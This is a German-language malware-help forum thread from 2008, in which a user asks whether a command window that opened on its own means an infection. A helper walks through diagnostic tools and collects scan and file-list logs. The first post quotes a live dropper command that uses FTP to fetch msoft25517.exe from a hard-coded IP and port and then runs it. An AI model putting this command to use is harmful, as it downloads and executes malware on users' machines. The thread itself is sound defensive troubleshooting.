Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Ist das ein Virus?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 23.05.2008, 11:08   #1
CandyDarling
 
Ist das ein Virus? - Frage

Ist das ein Virus?



Ich oute mich vorneweg als völlig Ahnungslose und vertraue ganz darauf, dass hier allwissende, hilfreiche Fachleute versammelt sind, die mir weiterhelfen können.

Zu meinem Problem:
Als ich heute Morgen meinen PC hochgefahren und mit dem Internet verbunden habe hat sich nach einer Weile ein DOS-Fenster mit folgendem Befehl geöffnet:

cmd /c echo open 85.179.158.184 3153 >> i &echo user xrsupf xrsupf >> i &echo get msoft25517.exe >> i &echo quit >> i &ftp -nv -s:i &msoft25517.exe &exit

Ich habe das Fenster einfach geschlossen, danach hat es sich noch einmal geöffnet und jetzt ist aber Ruhe.

Ich habe gestern ein neues Virenprogramm runter geladen (Avira AntiVir Personal) und mein System gecheckt. Dabei wurde nichts gefunden. Heute morgen habe ich die gleiche Prozedur noch mal gemacht, wieder ohne Ergebnis.

Dann habe ich in dem Verzeichnis „SYSTEM C: / Dokumente und Einstellungen / User“ folgende Dateien gefunden, die erst seit heute morgen existieren:
i
msoft25517.exe

Daraufhin habe ich den Kaspersky Online Scanner laufen lassen, der auch nichts gefunden hat. Ich habe weder im Forum noch allgemein im Netz etwas dazu gefunden und bin völlig ratlos und beunruhigt.

Meine Fragen:
Was steckt dahinter, wenn sich ein DOS-Fenster einfach so öffnet (meine Vermutung ist immer, dass das nichts Gutes bedeuten kann)?
Handelt es sich bei der „msoft25517.exe“-Datei um einen Virus und wenn ja, wie kriege ich den wieder los?

Alt 23.05.2008, 11:15   #2
markusg
/// Malware-holic
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Hallo,
ich bin Markus und wir werden in der nächsten Zeit Zusammenarbeiten.
Bitte mache keinerlei alleingänge bei der Reinigung und warte auf meine Anweisungen!
Das Auswerten der Logfiles kann immer eine Weile dauern also hab Geduld!

Schritt 1:
Teile mir dein genaues Problem mit. Wenn dein Antivirenprogramm Funde gemacht hat, schreibe mir was und wo gefunden wird poste eventuellforhandene logs.

Schritt 2:

kannst du alles auf deinem Rechner sehen? Überprüfe deine Einstellungen.

Im Windows-Explorer:
>Extras >Ordneroptionen >den Reiter "Ansicht" >Versteckte Dateien und Ordner >"alle Dateien und Ordner anzeigen" aktivieren und >Extras >Ordneroptionen
>den Reiter "Ansicht" >Dateien und Ordner >"Geschützte Systemdateien ausblenden (empfohlen)" deaktivieren.

Schritt 3:
  1. Lade das filelist.zip auf deinen Desktop herunter.
  2. entpacke
    die Zip-Datei auf deinen Desktop (kostenlose Zip-Tools)
  3. starte deinen Rechner neu auf
  4. öffne die nun auf deinem Destop vorhandene filelist.bat mit einem Doppelklick auf die Datei
  5. dein Editor
    (Textverarbeitungsprogramm) wird sich öffnen
  6. markiere von diesem Inhalt aus jedem Verzeichnis jeweils die letzten 30 Tage, wähle kopieren, füge diese
    Dateien deinem nächsten Beitrag an
  • Ein dickes Dankeschön an den moderatorModerator Karl vom hjt-forum.für die filelist.bat
    (Anleitung)
Dies sind die
Verzeichnisse von denen wir jeweils die letzten 30 Tage sehen wollen
:
Verzeichnis von C:\
Verzeichnis von C:\%WinDir%\%System%
Verzeichnis von C:\%WinDir%
Verzeichnis von C:\%WinDir%\Prefetch (Windows XP)
Verzeichnis von C:\%WinDir%\tasks
Verzeichnis von C:\%WinDir%\Temp
Verzeichnis von C:\DOCUME~1\Name\LOCALS~1\Temp

Hinweis:
%WinDir%, %System% sind Variable (?). Normalerweise ist dies C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), oder C:\Windows\System32
(Windows XP).
Schritt 4:
Laden und Instalieren von Hijackthis:
Besuche die Seite:
http://www.zdnet.de/downloads/prg/n/m/deGNNM-wc.htmlInstaller." Speichere diese Version auf Deinem PC.
Liste mit 1 Einträgen
• Doppelklicke auf "HJTInstall.exe" und folge den Anweisungen zum Installieren von HijackThis.
Listen Ende
Tu noch nichts weiter mit dem Programm wir benötigen es noch!

Schritt 5:

Bitte lade Deckard's System Scanner (DSS) herunter und speichere es auf
dem Desktop.
NB: Du musst mit Administrator-Rechten angemeldet sein.
  1. Schließe ALLE Anwendungen und Fenster.
  2. Doppel-klicke
    auf dss.exe um es auszuführen und folge den Prompts.
  3. Wenn der Scan vollendet ist, werden sich zwei Textdateien öffnen -

    main.txt <- dieses wird maximiert dargestellt und
    extra.txt <- dieses wird als minmierte Datei dargestellt
  4. Kopiere (STRG+A und STRG+C) und füge STRG+V) den Inhalt von main.txt und den Inhalt von extra.txt in deine nächste Antwort ein.
[/QUOTE]


so lange wir noch nichts genaues wissen, trenne den erchner vom internet wenn du nicht dran bist. besuche nur die von uns genannten seiten und verziechte auf onlinebanking etc.!
__________________


Alt 23.05.2008, 11:36   #3
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Danke für die schnelle Antwort, Markus!
Kaspersky hat nun doch was gefunden, ist aber noch nicht fertig. Ich melde mich wieder, wenn es soweit ist.
Schritt 2 habe ich gemacht.
Soll ich mit den weiteren Schritten abwarten, bis Kaspersky fertig ist, oder soll ich das jetzt schon machen?
__________________

Alt 23.05.2008, 11:41   #4
markusg
/// Malware-holic
 
Ist das ein Virus? - Standard

Ist das ein Virus?



hallo, ist das der online-scan von kaspersky? bitte keine funde löschen sondern nur das protokoll zeigen.
bitte dann keinerlei eigenständige reinigungsversuche mehr sondern nur nach anleitung arbeiten danke.
du nutzt ja jetzt antivir? dann senden wir nachher die kasp.funde an antivir damit das programm auch die erkennung hat.

Alt 23.05.2008, 11:46   #5
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Ja, es handelt sich um den Online-Scan. Ok, dann warte ich jetzt ab. Es geht aber ziemlich langsam voran - dauert bestimmt noch 1 Stunde, bis der Scan fertig ist. Er hat wohl neu angefangen, nachdem ich die Ordneroptionen geändert habe (Schritt 2). Wie kann ich den Befund an Antivir senden?


Alt 23.05.2008, 11:47   #6
markusg
/// Malware-holic
 
Ist das ein Virus? - Standard

Ist das ein Virus?



lass erst mal durchlaufen, zeig mir dann den report + die andern logs die ich sehen wollte und dann machen wir das schon ;-)

Alt 23.05.2008, 14:02   #7
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Hallo Markus,
bin wieder da und hab alles so durchgeführt wie beschrieben.



Schritt 1: Die Kaparsky Scan-Liste

Freitag, 23. Mai 2008 13:11:07
Betriebssystem: Microsoft Windows XP Professional, Service Pack 2 (Build 2600)
Version von Kaspersky Online Scanner: 5.0.98.1
Letztes Update der Antiviren-Datenbanken: 23/05/2008
Anzahl der Einträge in den Antiviren-Datenbanken: 798252
Scan-Einstellungen
Folgende Antiviren-Datenbanken zur Untersuchung verwenden Erweiterte
Archive untersuchen ja
Mail-Datenbanken untersuchen ja
Untersuchungsobjekt Kritische Objekte
C:\WINDOWS
C:\DOKUME~1\bettina\LOKALE~1\Temp\
Untersuchungsergebnisse
Untersuchte Objekte insgesamt 16191
Viren gefunden 0
Infizierte Objekte gefunden 0
Verdächtige Objekte gefunden 0
Untersuchungszeit 00:35:32

Name des infizierten Objekts Virusname Letzte Aktion
C:\WINDOWS\CSC\00000001 Das Objekt ist gesperrt übersprungen
C:\WINDOWS\Debug\PASSWD.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\SchedLgU.Txt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\SoftwareDistribution\EventCache\{F2A1CB15-A19E-49C0-B985-C6513F8D2A5B}.bin Das Objekt ist gesperrt übersprungen
C:\WINDOWS\SoftwareDistribution\ReportingEvents.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\Sti_Trace.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\CatRoot2\edb.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\CatRoot2\tmp.edb Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\AppEvent.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\default Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\default.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SAM Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SAM.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SecEvent.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SECURITY Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SECURITY.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\software Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\software.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SysEvent.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\system Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\system.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\h323log.txt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP Das Objekt ist gesperrt übersprungen
C:\WINDOWS\wiadebug.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\wiaservc.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\WindowsUpdate.log Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~DF1B68.tmp Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~DF1F5D.tmp Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~DFB510.tmp Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~DFC396.tmp Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~WRD0005.doc Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~WRF0004.tmp Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\bettina\LOKALE~1\Temp\~WRS2303.tmp Das Objekt ist gesperrt übersprungen
Die Untersuchung wurde abgeschlossen.



Schritt 2: durchgeführt



Schritt 3: Filelist
----- Root -----------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\

23.05.2008 14:10 804.835.328 hiberfil.sys
23.05.2008 14:10 1.207.959.552 pagefile.sys


----- System32 -------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\WINDOWS\system32

23.05.2008 14:11 2.422 wpa.dbl
16.05.2008 20:09 114.968 FNTCACHE.DAT
16.05.2008 19:06 397.560 perfh009.dat
16.05.2008 19:06 59.780 perfc009.dat
16.05.2008 19:06 411.266 perfh007.dat
16.05.2008 19:06 72.490 perfc007.dat
16.05.2008 19:06 906.280 PerfStringBackup.INI
16.05.2008 18:59 138.648 TZLog.log
09.05.2008 14:35 16.863.864 MRT.exe

----- Prefetch -------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\WINDOWS\Prefetch

23.05.2008 14:20 15.798 CMD.EXE-087B4001.pf
23.05.2008 14:19 17.622 NOTEPAD.EXE-336351A9.pf
23.05.2008 14:19 26.732 WINRAR.EXE-3588DFE8.pf
23.05.2008 14:19 137.892 IEXPLORE.EXE-2CA9778D.pf
23.05.2008 14:18 34.652 ALICECNN.EXE-03E02840.pf
23.05.2008 14:13 63.650 WUAUCLT.EXE-399A8E72.pf
23.05.2008 14:12 15.324 ALG.EXE-0F138680.pf
23.05.2008 14:12 30.958 WMIPRVSE.EXE-28F301A9.pf
23.05.2008 14:12 17.530 IMAPI.EXE-0BF740A4.pf
23.05.2008 14:12 72.032 AVWSC.EXE-3AC95876.pf
23.05.2008 14:12 13.148 WINVNC4.EXE-067C548E.pf
23.05.2008 14:12 9.786 WSCNTFY.EXE-1B24F5EB.pf
23.05.2008 14:12 6.916 WDFMGR.EXE-2CF4013B.pf
23.05.2008 14:12 15.972 MDM.EXE-27F66238.pf
23.05.2008 14:12 53.074 AVGUARD.EXE-1B26F309.pf
23.05.2008 14:12 865.258 NTOSBOOT-B00DFAAD.pf
23.05.2008 14:09 19.644 LOGONUI.EXE-0AF22957.pf
23.05.2008 14:06 56.858 AVSCAN.EXE-0D0CD933.pf
23.05.2008 14:01 230.334 SSSTARS.SCR-2D6FC20D.pf
23.05.2008 13:16 100.314 WINWORD.EXE-259486DA.pf
23.05.2008 13:12 45.200 AVCENTER.EXE-324B1681.pf
23.05.2008 13:11 89.316 FIREFOX.EXE-17EE503B.pf
23.05.2008 13:01 86.384 ACRORD32INFO.EXE-30CEC19C.pf
23.05.2008 13:00 12.754 VERCLSID.EXE-3667BD89.pf
23.05.2008 12:23 19.356 RUNDLL32.EXE-2DD9023C.pf
23.05.2008 12:23 35.236 RUNDLL32.EXE-17BD4855.pf
23.05.2008 11:09 15.850 SVCHOST.EXE-3530F672.pf
23.05.2008 11:08 16.382 RUNDLL32.EXE-118B98F4.pf
23.05.2008 11:08 25.662 RUNDLL32.EXE-188DF14E.pf
23.05.2008 10:53 100.566 ACRORD32.EXE-0EC716D9.pf
23.05.2008 10:52 67.828 AVNOTIFY.EXE-0B59FC42.pf
23.05.2008 10:37 13.654 FTP.EXE-0FFFB5A3.pf
23.05.2008 10:37 16.070 RUNDLL32.EXE-125C2F81.pf
23.05.2008 10:33 19.746 RUNDLL32.EXE-42367DFC.pf
23.05.2008 10:32 12.336 RUNDLL32.EXE-451FC2C0.pf
23.05.2008 10:32 32.494 RUNDLL32.EXE-1D50A4A3.pf
22.05.2008 22:37 4.900 APPSTOP.EXE-00633745.pf
22.05.2008 22:28 37.190 AVCONFIG.EXE-2E17BE74.pf
22.05.2008 22:28 15.038 RUNDLL32.EXE-29ACD517.pf
22.05.2008 22:27 11.814 U3APPWRAPPER.EXE-1F9A0579.pf
22.05.2008 22:27 83.146 LAUNCHPAD.EXE-046644C1.pf
22.05.2008 22:27 14.266 LAUNCHU3.EXE-09AB4AF2.pf
22.05.2008 22:26 9.138 CLEANUP.EXE-2912D4E7.pf
22.05.2008 22:22 78.792 EXCEL.EXE-3281D776.pf
22.05.2008 21:57 16.286 AOM.EXE-04CC7735.pf
22.05.2008 21:57 62.454 ACROBAT.EXE-2F9C16DD.pf
22.05.2008 21:54 42.576 POWERPNT.EXE-019F2E3D.pf
22.05.2008 21:52 15.574 LAUNCHU3.EXE-209CBEEF.pf
22.05.2008 21:30 12.612 SOL.EXE-1C0C14EB.pf
22.05.2008 21:13 43.606 POWERDVD.EXE-35D9A3BA.pf
22.05.2008 21:13 75.042 NERO.EXE-32314E31.pf
22.05.2008 20:46 11.752 RUNDLL32.EXE-268BFF96.pf
22.05.2008 19:45 32.294 RUNDLL32.EXE-1831A4F3.pf
22.05.2008 19:45 28.032 CONTROL.EXE-013DBFB5.pf
22.05.2008 19:44 45.932 AVGNT.EXE-18356F59.pf
22.05.2008 19:43 53.708 UPDATE.EXE-3A80F1D2.pf
22.05.2008 19:43 17.618 PREUPD.EXE-18CBCD87.pf
22.05.2008 19:42 22.964 SCHED.EXE-0664954F.pf
22.05.2008 19:42 15.318 REGSVR32.EXE-25EEFE2F.pf
22.05.2008 19:41 16.418 RUNDLL32.EXE-2CBA7525.pf
22.05.2008 19:41 11.838 GRPCONV.EXE-111CD845.pf
22.05.2008 19:41 17.230 RUNONCE.EXE-2803F297.pf
22.05.2008 19:41 16.516 RUNDLL32.EXE-26C2C861.pf
22.05.2008 19:40 24.638 SETUP.EXE-12651A49.pf
22.05.2008 19:40 37.276 ANTIVIR_WORKSTATION8_WINU_DE_-1E4C1070.pf
22.05.2008 19:38 24.238 RUNDLL32.EXE-22C6D557.pf
22.05.2008 19:38 13.896 RUNDLL32.EXE-35E24F1C.pf
22.05.2008 19:34 24.216 SETUP.EXE-12BD2899.pf
22.05.2008 19:33 53.252 RUNDLL32.EXE-13404D23.pf
22.05.2008 19:32 39.326 AVCONFIG.EXE-3B8B9C26.pf
22.05.2008 19:32 14.718 RUNDLL32.EXE-2A96CBB1.pf
22.05.2008 19:28 39.744 AVCENTER.EXE-37584419.pf
22.05.2008 19:22 23.894 RUNDLL32.EXE-1E6B551B.pf
22.05.2008 19:22 13.896 RUNDLL32.EXE-2E0ADD37.pf
22.05.2008 19:22 45.618 AVGUARD.EXE-3490B18B.pf
22.05.2008 19:22 19.490 SCHED.EXE-236A886F.pf
22.05.2008 16:49 24.362 RUNDLL32.EXE-13FE954E.pf
22.05.2008 16:49 13.908 RUNDLL32.EXE-4110BCFA.pf
22.05.2008 06:11 23.894 RUNDLL32.EXE-19002F9C.pf
22.05.2008 06:11 13.896 RUNDLL32.EXE-1645CEF0.pf
21.05.2008 18:44 52.882 DRWTSN32.EXE-2B4B52AC.pf
21.05.2008 18:44 63.036 DWWIN.EXE-30875ADC.pf
21.05.2008 18:43 59.412 DW.EXE-05756616.pf
21.05.2008 18:14 23.730 RUNDLL32.EXE-1E54657D.pf
21.05.2008 18:14 13.896 RUNDLL32.EXE-2B61878E.pf
21.05.2008 14:42 21.276 RUNDLL32.EXE-42189410.pf
21.05.2008 14:42 13.896 RUNDLL32.EXE-4C69ADA6.pf
21.05.2008 11:06 41.478 HH.EXE-2D1A70B3.pf
21.05.2008 11:01 5.748 _ISDEL.EXE-1705F129.pf
21.05.2008 11:01 21.300 _INS5576._MP-30465C39.pf
21.05.2008 11:01 14.794 SETUP.EXE-393E66AE.pf
21.05.2008 10:59 5.308 CHMSTART.EXE-0DEEB877.pf
21.05.2008 10:36 33.490 DVD SHRINK 3.2.EXE-374FD762.pf
21.05.2008 10:24 236.136 DUMPREP.EXE-1B46F901.pf
21.05.2008 10:05 24.318 RUNDLL32.EXE-36985CD9.pf
21.05.2008 10:05 8.560 RUNDLL32.EXE-4181EC2E.pf
20.05.2008 23:55 27.334 AUDIOGRABBER.EXE-321295D7.pf
20.05.2008 23:51 24.326 RUNDLL32.EXE-4874F1B0.pf
20.05.2008 23:51 13.896 RUNDLL32.EXE-35AD54B9.pf
20.05.2008 17:20 17.326 RUNDLL32.EXE-12E27DD0.pf
20.05.2008 16:56 86.666 WINAMP.EXE-08C38ED9.pf
20.05.2008 16:51 24.318 RUNDLL32.EXE-22A08912.pf
20.05.2008 16:51 8.560 RUNDLL32.EXE-39C15FC9.pf
20.05.2008 11:38 19.758 RUNDLL32.EXE-3E30109D.pf
20.05.2008 11:38 13.908 RUNDLL32.EXE-180874F9.pf
20.05.2008 09:38 13.428 RUNDLL32.EXE-1DC33505.pf
20.05.2008 09:38 8.560 RUNDLL32.EXE-380466DD.pf
19.05.2008 20:48 430.176 Layout.ini
19.05.2008 20:44 79.330 HELPSVC.EXE-2878DDA2.pf
19.05.2008 18:36 45.592 UPDATE.EXE-13D57D76.pf
19.05.2008 18:36 13.796 PREUPD.EXE-358AA1C1.pf
19.05.2008 15:04 45.244 DFRGNTFS.EXE-269967DF.pf
19.05.2008 15:04 17.414 DEFRAG.EXE-273F131E.pf
19.05.2008 14:48 19.758 RUNDLL32.EXE-3D09F091.pf
19.05.2008 14:48 22.194 RUNDLL32.EXE-4C5CDB5E.pf
19.05.2008 11:50 16.898 PDFSAVER3.EXE-2F885701.pf
19.05.2008 11:33 21.054 RUNDLL32.EXE-3A84A48C.pf
19.05.2008 11:33 13.896 RUNDLL32.EXE-3F00FC2B.pf
19.05.2008 00:06 12.898 QTTASK.EXE-2D7EEF34.pf
18.05.2008 23:03 44.302 RUNDLL32.EXE-45A84456.pf
18.05.2008 23:03 13.896 RUNDLL32.EXE-21A3416B.pf
18.05.2008 19:11 98.010 FIREFOX.EXE-1D57670A.pf
18.05.2008 18:37 24.350 RUNDLL32.EXE-4B2066E9.pf
18.05.2008 18:37 8.560 RUNDLL32.EXE-3271BB30.pf
18.05.2008 14:14 24.330 RUNDLL32.EXE-14EF0AAB.pf
18.05.2008 14:14 13.908 RUNDLL32.EXE-3E93A44B.pf
17.05.2008 21:04 20.466 MSMSGS.EXE-32066BA5.pf
17.05.2008 21:04 47.694 OUTLOOK.EXE-22C5790A.pf
17.05.2008 21:03 17.080 TASKMGR.EXE-20256C55.pf
17.05.2008 17:49 63.486 MSIEXEC.EXE-2F8A8CAE.pf
130 Datei(en) 5.686.316 Bytes
0 Verzeichnis(se), 1.911.697.408 Bytes frei

----- Windows --------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\WINDOWS

23.05.2008 14:12 58.243 setupapi.log
23.05.2008 14:12 0 0.log
23.05.2008 14:12 1.344.691 WindowsUpdate.log
23.05.2008 14:11 2.048 bootstat.dat
23.05.2008 14:09 32.638 SchedLgU.Txt
23.05.2008 14:09 216 wiadebug.log
23.05.2008 11:09 50 wiaservc.log
21.05.2008 01:03 34 cdplayer.ini
19.05.2008 00:06 54.156 QTFont.qfn
17.05.2008 18:35 2.396 WgaNotify.log
17.05.2008 18:18 2.891 mozver.dat
16.05.2008 21:39 1.409 QTFont.for
16.05.2008 21:12 116 NeroDigital.ini
16.05.2008 20:11 2.735 spupdsvc.log
16.05.2008 19:10 833.294 iis6.log
16.05.2008 19:10 253.596 comsetup.log
16.05.2008 19:10 152.042 ntdtcsetup.log
16.05.2008 19:10 337.423 tsoc.log
16.05.2008 19:10 37.328 tabletoc.log
16.05.2008 19:10 40.557 ocmsn.log
16.05.2008 19:10 1.374 imsins.log
16.05.2008 19:10 33.439 KB927779.log
16.05.2008 19:10 128.418 netfxocm.log
16.05.2008 19:10 352.988 ocgen.log
16.05.2008 19:10 50.786 MedCtrOC.log
16.05.2008 19:10 36.715 msgsocm.log
16.05.2008 19:10 728.737 FaxSetup.log
16.05.2008 19:10 231.842 msmqinst.log
16.05.2008 19:10 36.537 updspapi.log
16.05.2008 19:10 1.374 imsins.BAK
16.05.2008 19:10 29.970 KB927802.log
16.05.2008 19:10 22.191 KB943460.log
16.05.2008 19:10 31.659 KB937894.log
16.05.2008 19:09 20.826 KB948881.log
16.05.2008 19:09 30.619 KB928255.log
16.05.2008 19:09 31.080 KB931784.log
16.05.2008 19:08 20.588 KB933729.log
16.05.2008 19:08 28.754 KB923980.log
16.05.2008 19:08 28.150 KB936021.log
16.05.2008 19:08 27.332 KB938828.log
16.05.2008 19:08 25.382 KB924667.log
16.05.2008 19:02 27.839 KB924270.log
16.05.2008 19:02 26.441 KB931261.log
16.05.2008 19:02 26.772 KB941644.log
16.05.2008 19:02 31.401 KB947864.log
16.05.2008 19:01 16.588 KB927891.log
16.05.2008 19:01 23.748 KB936357.log
16.05.2008 19:01 23.668 KB941693.log
16.05.2008 19:01 23.681 KB946026.log
16.05.2008 19:00 15.325 KB925398.log
16.05.2008 19:00 24.179 KB925902.log
16.05.2008 19:00 23.269 KB929123.log
16.05.2008 19:00 22.465 KB926436.log
16.05.2008 18:59 34.358 KB942763.log
16.05.2008 18:59 22.778 KB930178.log
16.05.2008 18:59 14.653 KB941569.log
16.05.2008 18:59 24.045 KB932168.log
16.05.2008 18:59 21.947 KB941202.log
16.05.2008 18:59 22.159 KB918118.log
16.05.2008 18:58 22.248 KB926255.log
16.05.2008 18:58 21.439 KB941568.log
16.05.2008 18:58 21.742 KB948590.log
16.05.2008 18:58 21.511 KB938127.log
16.05.2008 18:58 22.432 KB944338.log
16.05.2008 18:58 21.507 KB920213.log
16.05.2008 18:58 19.398 KB935840.log
16.05.2008 18:57 19.331 KB943485.log
16.05.2008 18:57 19.053 KB945553.log
16.05.2008 18:57 17.931 KB930916.log
16.05.2008 18:57 20.931 KB950749.log
16.05.2008 18:57 10.414 KB923689.log
16.05.2008 18:56 284.284 msxml4-KB936181-enu.LOG
16.05.2008 18:56 17.748 KB935839.log
16.05.2008 18:56 17.391 KB943055.log
16.05.2008 18:54 17.481 KB944653.log
16.05.2008 18:54 8.292 KB936782.log
16.05.2008 18:54 69.037 wmsetup.log
16.05.2008 18:53 17.162 KB928843.log
16.05.2008 18:26 1.377.532 setupapi.log.0.old
15.05.2008 20:09 1.020 netcfg.log
15.05.2008 20:08 111 telephon.ini
05.05.2008 13:29 2.161 wsb2007.ini
05.05.2008 13:24 1.881 gsb2007.ini


----- Tasks ----------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\WINDOWS\tasks

23.05.2008 14:11 6 SA.DAT
04.08.2004 14:00 65 desktop.ini
2 Datei(en) 71 Bytes
0 Verzeichnis(se), 1.911.693.312 Bytes frei

----- Wintemp --------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\WINDOWS\temp

17.05.2008 18:24 0 UpdC.tmp
16.05.2008 19:07 92.320 dd_dotnetfx20install.txt
16.05.2008 19:07 28.672 uxeventlog.txt
16.05.2008 19:07 9.563.130 dd_NET_Framework20_Setup0924.txt
16.05.2008 19:07 16.384 Perflib_Perfdata_6ec.dat
16.05.2008 19:06 5.158 ASPNETSetup_00000.log
16.05.2008 19:03 21.280 dd_depcheck_NETFX20_EXP_35.txt
16.05.2008 19:02 2 dd_dotnetfx20error.txt
15.05.2008 20:42 0 Upd2.tmp


----- Temp -----------------------------
Datentr„ger in Laufwerk C: ist SYSTEM
Volumeseriennummer: 2051-FFB8

Verzeichnis von C:\DOKUME~1\bettina\LOKALE~1\Temp

23.05.2008 14:20 119.173 filelist.txt
23.05.2008 14:16 95.736 jusched.log
22.05.2008 22:27 81.920 ~DFE791.tmp
22.05.2008 22:27 68.752 U3Launcher.log
21.05.2008 18:44 279.108 9c5_appcompat.txt
21.05.2008 18:43 16.384 ~WRF0003.tmp
21.05.2008 18:13 16.384 ~DFE3ED.tmp
21.05.2008 01:01 16.384 ~WRF0002.tmp
17.05.2008 18:17 16.384 ~DF4859.tmp
15.05.2008 20:08 94.127 setup643.log
15.05.2008 16:10 34.304 ~e5d141.tmp
15.05.2008 16:10 693 TWAIN.LOG
15.05.2008 16:10 2 Twain001.Mtx
15.05.2008 16:10 156 Twunk001.MTX
13.05.2008 20:20 0 28fd_appcompat.txt
13.05.2008 20:00 798.234 IMT3.xml
13.05.2008 20:00 426 IMT2.xml
13.05.2008 20:00 2.036 IMT1.xml
13.05.2008 20:00 16.384 ~DF71E1.tmp
11.05.2008 19:38 101.376 ~WRS3437.tmp
11.05.2008 18:55 69 ~WRD0002.doc
11.05.2008 18:53 16.384 ~WRF0001.tmp
10.05.2008 22:53 41 75990D7C.TMP
08.05.2008 15:24 508.420 ~WRS0002.tmp
08.05.2008 13:10 69 ~WRD0001.doc
08.05.2008 13:08 16.384 ~WRF0000.tmp
07.05.2008 16:20 16.384 ~DFB1A7.tmp
27.04.2008 21:56 798.234 IMT8.xml
27.04.2008 21:56 426 IMT7.xml
27.04.2008 21:56 2.036 IMT6.xml
27.04.2008 21:22 798.234 IMT5.xml
27.04.2008 21:22 426 IMT4.xml
27.04.2008 14:53 671 PDFMaker.log
27.04.2008 14:53 61.440 75487.mst
27.04.2008 14:53 0 ~2.tmp



Schritt 4: Hijackthis
installiert, aber noch nicht gestartet



Schritt 5: DSS
heruntergeladen, aber Ausführen klappt nicht.
Problemmeldung bzgl. folgender Datei:C:\DOKUME~1\bettina\LOKALE~1\Temp\a6be_appcompat.txt
Entsprechend öffnen sich auch die beiden Fenster nicht, die du beschrieben hast.

Ich hab gesehen, dass du gerade offline bist. Ich gehe daher jetzt auch kurz einkaufen und bin in spätestens 1 Stunde zurück. Ich hoffe wir können das Problem heute noch lösen... Ich hatte erst einmal einen Virus und bin damit völlig überfordert!

Bis dahin...

Alt 24.05.2008, 20:18   #8
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Konnte das Problem noch nicht lösen...

Alt 24.05.2008, 20:25   #9
markusg
/// Malware-holic
 
Ist das ein Virus? - Standard

Ist das ein Virus?



und ich hab noch net alle logs lies die anleitung bitte

Alt 24.05.2008, 20:38   #10
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Sorry, wollte nicht ungeduldig rüber kommen. Ich wollte nur was schreiben, damit das Thema wieder hochrutscht... Super, dass du wieder da bist. Ich weiss nicht genau was dir noch fehlt. ich habe heute DSS noch mal laufen lassen und siehe da - es hat funktioniert.
Was soll ich mit HJT machen?

hier erst mal DSS Teil 1 (Teil 2 folgt --> Mail wird sonst zu lang)

Deckard's System Scanner v20071014.68
Run by *** on 2008-05-24 20:17:20
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- System Restore --------------------------------------------------------------

